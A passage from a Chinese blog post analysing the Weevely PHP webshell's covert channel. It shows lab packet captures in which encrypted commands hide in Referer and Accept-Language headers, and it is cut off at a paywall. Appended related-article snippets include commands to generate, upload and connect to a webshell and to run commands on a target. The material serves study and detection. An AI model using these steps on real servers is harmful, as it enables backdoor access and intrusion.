Weevely使用及源码分析(二)

最新推荐文章于 2025-11-11 19:11:49 发布
原创 最新推荐文章于 2025-11-11 19:11:49 发布 · 2.9k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #wireshark #源码 #weevely #后门

本文深入分析了Weevely工具的两种PHP模板(stegaref_php.tpl和legacycookie_php.tpl)的后门机制,包括协议交互、数据包结构、加密payload解密过程。通过Wireshark抓包,展示了请求包和响应包的内容,并详细解释了数据包载荷如何在Referer头和Cookie中隐藏。通过对Weevely源码的分析,揭示了webshell控制通道的工作原理和核心函数send()的流程。

1. 定义(术语、名词解释)

   客户端:运行Weevely进程的计算机。
   服务端:存有PHP木马的服务器。

2. 协议交互流程

   在客户端,Weevely每执行一条命令就通过HTTP协议发出一条GET/POST请求;在服务端,木马针对每条GET/POST请求作出响应,产生一条响应包。

3. 数据包及源码分析

   通过对源代码进行走读以及wireshark进行抓包分析,可以看出Weevely主要生成的php后门文件主要有三种模板:stegaref_php.tpl,legacycookie_php.tpl,stegaref_php_debug.tpl。其中stegaref_php.tpl与stegaref_php_debug.tpl两种php模板类似,主要特点是返回的response_body中的标签stegaref_php.tpl为<连接密码md5加密前八位>标签,stegaref_php_debug.tpl为:<连接密码md5加密前八位+DEBUG>标签,同时响应体中的内容stegaref_php_debug.tpl模板把主要的有用数据字段全都显示出来了,主要用于前期debug使用,所以本文档主要分析了stegaref_php.tpl和legacycookie_php.tpl两种使用模板。

3.1 stegaref_php.tpl模板

   以ip为136的kali虚拟机为客户端对含有后门文件的ip为137的kali虚拟机作为服务器进行远程连接。连接成功后在客户端命令行中输入命令whoami查看回显内容。通过Wireshark我们抓取到了两个TCP数据流。分别为:

3.1.1 请求包

数据包

GET /backdoor.php HTTP/1.1
Accept-Encoding: identity
Accept-Language: uk-UA,mi;q=0.5,mt;q=0.7,mk;q=0.8
Host: 192.168.182.137
Accept: text/html,text/plain;0.9,*/*
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.427.0 Safari/534.1
Connection: close
Referer: http://www.google.bt/url?sa=t&rct=j&q=168.182.137&source=web&cd=799&ved=bd6Tfh__3&url=168.182&ei=z5HrNlsxt6GOIdThqz-xn9&usg=_WO2gRIcnxgee6zgNBv-_H_-rGFUhmIHND

分析

HTTP攻击载荷主要存储于Referer头中,通过Accept-Language头中存储的sessionid和payload的数组偏移量对加密的payload进行提取。|

数据包

GET /backdoor.php HTTP/1.1
Accept-Encoding: identity
Accept-Language: ur-PK,mh;q=0.4
Connection: close
Accept: text/html,application/xml;0.9,*/*
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Host: 192.168.182.137
Cookie: PHPSESSID=fkdt4fv5tkn3q2hnhp10rv65o5
Referer: http://translate.googleusercontent.com/translate_c?depth=1&rurl=translate.google.com&sl=auto&tl=en&usg=hiNRM7PjQ220tyDdwupmXEp1ZrLJkF0aFf

分析

HTTP攻击载荷主要存储于Referer头中,通过Accept-Language头中存储的sessionid和payload的数组偏移量对加密的payload进行提取。

   通过对Weevely源码进行分析,确定数据包格式主要通过7种不同的构造Referer数据报头方法进行对加密的payload进行填充。Referer头格式为:

http://www.google.${ tpl.rand_google_domain() }/url?sa=t&rct=j&q=${ tpl.target_name() }&source=web&cd=${ tpl.rand_number(3) }&ved=${ tpl.payload_chunk(9) }&url=${ tpl.target_name() }&ei=${ tpl.payload_chunk(22) }&usg=${ tpl.payload
最低0.47元/天 解锁文章
Weevely使用源码分析(三)
fly小灰灰的专栏
01-30 1919
1 weevely验证机制分析 1.1 源码分析    当生成的php文件是以stegaref_php.tpl文件为模板时,当我们在连接时的命令行中输入任意命运就可以触发php.py文件中的_check_interpreter()函数,_check_interpreter()函数主要功能是随机生成一个命令,”echo”一个从11111到99999大小的随机整数,然后分别调用channels
Weevely使用源码分析(一)
fly小灰灰的专栏
01-30 2702
1. 简介 1.1 前言    weevely 是一款使用python编写的webshell工具(集webshell生成和连接于一身),采用C/S模式构建,可以算作是linux下的一款菜刀替代工具(限于PHP),具有很好的隐蔽性,在Linux下具有: 服务器配置审计 后门放置 暴力破解 文件管理 资源搜索 网络代理 命令执行 系统信息收集 端口扫描等功能 1.2 测试环境
Weevely3 项目推荐
最新发布
gitblog_00585的博客
11-11 328
Weevely3 是一个功能强大的武器化 Web Shell 工具,主要用于后渗透测试阶段。该项目由 Python 和 PHP 语言编写,其中 Python 用于构建命令行工具,而 PHP 则用于生成和执行 Web Shell 脚本。Weevely3 的设计目标是通过网络扩展其功能,并在目标服务器上提供远程 shell 访问。 ## 项目核心功能 Weevely3 提供了超过 30 个模块,用
渗透测试Web利器篇之Weevely介绍、安装以及简单使用
lzp_5257的博客
04-20 3875
提示:文章内容仅用于渗透测试研究学习,请勿用于非法测试 一、Weevely介绍 Weevely是一款使用python编写的webshell工具,集webshell生成和连接于一身,采用c/s模式 构建,可以算作是linux下的一款php菜刀替代工具,具有很好的隐蔽性 在linux上使用时还是很好的,集服务器错误配置审计,后门放置,暴力破解,文件管理,资 源搜索,网络代理,命令执行,数据库操作,系统信息收集及端口扫描等功能 下载地址:https://github.com/epinna/weevely3.
Shelly:带Python的简单后门管理器(基于weevely
02-05
雪莉| 使用Python的简单后门管理器(基于weevely) Shelly是使用Python编写的简单工具,其功能是远程访问网站 安装: $ git clone $ cd雪莉$ python3 shell.py 要求 : sudo pip install -r requirements.txt 范例: python3 shell.py -g wp-log -p tegal1337 ______ ____ / __/ / ___ / / __ __ _\ \/ _ / -_/ / / // / /___/_//_\__/_/_/\_, /
Weevely
Nixawk
07-31 2103
Weevely 出现已经有一段时间了, 今天
weevely报错 core.weexceptions.ArgparseError:the followibg arguments are required:url,password怎么解决
04-19
好的,我现在需要解决用户在使用Weevely时遇到的缺少telnetlib模块和ArgparseError的问题。首先,用户提到这两个错误,我需要分别分析可能的原因和解决方法。 首先,关于缺少telnetlib模块的问题。telnetlib是...
34_Web漏洞扫描工具、常见Web漏洞扫描工具、AWVS的部署与使用、 渗透测试的概念、分类及流程、AWVS破解
weixin_54591045的博客
08-14 1041
Web漏洞扫描工具、常见Web漏洞扫描工具、AWVS的部署与使用、 渗透测试执行流程、AWVS破解
weevely3.3.1:Weevely旧版本(3.3.1)
03-25
韦韦利 Weevely是一个命令行Web Shell,可在运行时通过网络动态扩展,旨在用于远程管理和渗透测试。 它提供了一个类似ssh的终端,即使在受限的环境中,也只需将PHP脚本拖放到目标服务器上。 低资源占用的代理程序和30多个模块构成了一个可扩展的框架,用于管理Web帐户并发布漏洞利用Web服务器以提升特权并在网络中横向移动。 阅读中的教程和用例。 模块功能: 类SSH终端 在目标上运行SQL控制台透视 代理以目标为中心的HTTP流量 主机配置安全审核 在本地挂载目标文件系统 进行以目标为中心的网络扫描 文件上传下载 生成反向和直接TCP Shell Bruteforce内部服务 管理压缩档案 后门代理 远程代理是一个小PHP脚本,可以在运行时通过网络扩展其功能。 代理代码是多态的,几乎无法被AV检测到,并且流量在HTTP请求中被混淆。 模块开发 Weevely还提供了py
入侵检测——weevely
LainWith的博客
08-26 828
这里写目录标题介绍使用环境生成webshell上传webshell连接webshell命令执行编写规则4.0.1版本1.1版本规则参考 介绍 Weevely工具Python语言编写,集生成木马与加连接于一身,相当于Linux中的中国菜刀,但只适用于php网站,已经加入Kali豪华大礼包中。在Kali1.0中集成的低版本V1.1更是功能强大,支持图片与.htaccess两种绕过方式。新版本中将这两种功能阉割掉了,但是生成的木马文件仍然进行了加密处理。 ​ 在实操过程中发现,使用weevely生成的webshe
实战Webshell管理工具Weevely检测思路分析
2401_84466229的博客
06-04 1011
根据固定长度计算方法:16(随机字符)+ 12(秘钥)+ len(X) + 12(秘钥)+ 16(随机字符)可知Content-Length值为:83/80/79,此处证明了之前的猜想是成立的。第三步:Client通过解密函数utils.sting.sxor()、zlib.decompress()、base64.b64decode()对接收服务端响应的body字符串进行解密,并判断字符串是否和send()函数发送到服务端的“X”值相同,从而判断客户端与服务端是否能够成功建立通信。此教程为纯技术分享!
weevely3:武器化的Web外壳
04-05
韦韦利 姓名 Weevely-武器化的Web Shell 用法 weevely generate <password> <path> weevely <URL> <password> [cmd] 描述 Weevely是为后开发目的而设计的Web Shell,可以在运行时通过网络对其进行扩展。 将weevely PHP代理上载到目标Web服务器以获得对它的远程Shell访问。 它具有30多个模块,可协助管理任务,维护访问,提供态势感知,提升特权并传播到目标网络。 阅读“页面以安装weevely及其依赖项。 阅读“页面以生成代理并连接到它。 浏览以阅读示例和用例。 特征 Shell访问目标 以目标为中心SQL控制台 HTTP / HTTPS代理浏览目标 上传和下载文件 生成反向和直接TCP Shell 审核远程目标安全 端口扫描以目标为中心 挂载远程文件系统 以目标为中心的Brute
关于weevely的phar木马分析
Fright-Moch的博客
10-28 393
webshell密码拼接起来就是。
网络安全——Webshell管理工具
weixin_54055099的博客
08-21 5337
Webshell的应用,中国菜刀、蚁剑、weevely、御剑、Havij的使用
weevely工具使用
淡巴枯的博客
05-23 7584
weevely工具使用 目录一. 关于weevely. 安装weevely三. 使用weevely四. weevely实战五. 常用模块六. weevely工作原理 声明:本文禁止转载。 仅作网络安全学习交流,切勿用于任何非法用途,否则后果自负。 一. 关于weevely   weevely是一款基于python编写的webshell管理工具,其优点是跨平台,隐蔽性不错,参数随机生成并加密。但缺点是只支持php。   我们可以在普通的一句话木马上传无效的情况下,使用weevley工具生成的一
weevely的webshell分析以及冰蝎/蚁剑免杀-PHP
yggcwhat
05-02 2657
weevely的webshell分析以及冰蝎/蚁剑免杀-PHP
使用Weevely工具上传一句话木马
一颗小松子.的博客
01-27 3442
Weevely在上传木马进行后渗透测试的过程中可用于模拟一个类似于telnet的连接shell 通常用于web程序的漏洞利用,隐藏后门或者使用类似telnet的方式来代替web 页面式的管理 Weevely生成的服务器端php代码经过了base64编码,可以绕过主流的杀毒软件和IDS 上传服务器端代码后通常可以通过weevely直接运行 使用它可以浏览文件系统,检测服务器设置,创建tcpshell和reverse shell。
WebShell基础详解(特点、原理、分类、工具)
热门推荐
诚邀网络通信领域商务合作
01-07 1万+
文章目录一、WebShell简介、WebShell特点三、WebShell分类四、WebShell原理五、内存马六、WebShell管理工具 一、WebShell简介 Webshell就是以asp、php、jsp或cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。 “web”的含义是显然 需要服务器开放web服务,“shell”的含义是 取得对服务器某种程度上操作权限。 webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。 由于webshell其大多..
分离Weevely加密模块加密任意WebShell
blrk
03-22 1256
http://www.freebuf.com/tools/7875.html
weevely使用教程
04-02
### Weevely 使用指南 Weevely 是一种轻量级的 PHP Webshell 工具,旨在通过受感染的目标服务器执行命令并提供交互式访问。以下是关于如何使用 Weevely 的详细介绍: #### 安装与配置 为了开始使用 Weevely,首先需要安装该工具。可以通过以下方式获取最新版本: ```bash git clone https://github.com/epinna/weevely3.git cd weevely3 pip install -r requirements.txt ``` 完成上述操作后即可运行 Weevely。 #### 创建自定义 Shell 文件 Weevely 支持生成加密后的 shell 脚本文件以便上传到目标服务器。可以利用如下命令创建一个新的 webshell 文件: ```bash weevely generate password /path/to/shell.php ``` 这里,“password”是你设置用于连接此特定 shell 所需的秘密密码;而 `/path/to/shell.php` 则表示保存生成脚本的位置[^1]。 #### 连接到远程主机上的 Shell 一旦成功将生成好的 php 文件放置于目标机器上之后,就可以尝试建立连接了。假设已知 URL 地址以及之前设定过的密钥,则可通过下面这条指令实现登录功能: ```bash weevely http[s]://target_url/path_to_shell.php your_password ``` 如果一切正常的话,此时应该能够看到提示符表明进入了互动模式下[^2]。 #### 基础命令集概览 进入会话以后,可使用的部分基础命令列举如下: - `ls`: 查看当前目录下的文件列表。 - `pwd`: 显示当前位置路径名。 - `cat filename`: 输出指定文档的内容至屏幕显示出来。 - `upload local_file remote_path`: 将本地计算机中的某个档案传送到远端设备上去存储起来。 - `download url destination`: 下载网络资源存放到服务器内部某处位置。 - `exec command_string`: 对操作系统下达额外的一般用途型态之指示串列去被执行处理完毕后再返回结果给使用者查看[^3]。 #### 高级特性介绍 除了基本的操作之外,Weevely 还提供了许多高级特性和模块扩展支持,比如数据库管理、反向代理设置等功能都可以借助插件形式加载进来增强其功能性表现力。 ```python import weevely.remote as wr # Example of using the API programmatically within Python scripts. session = wr.Session('http://example.com/shell.php', 'secret') output = session.execute('id') # Execute a system-level ID command on target machine. print(output.decode()) ``` 以上就是有关 Weevely 主要组成部分及其应用方法的一个简单概述说明文档。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值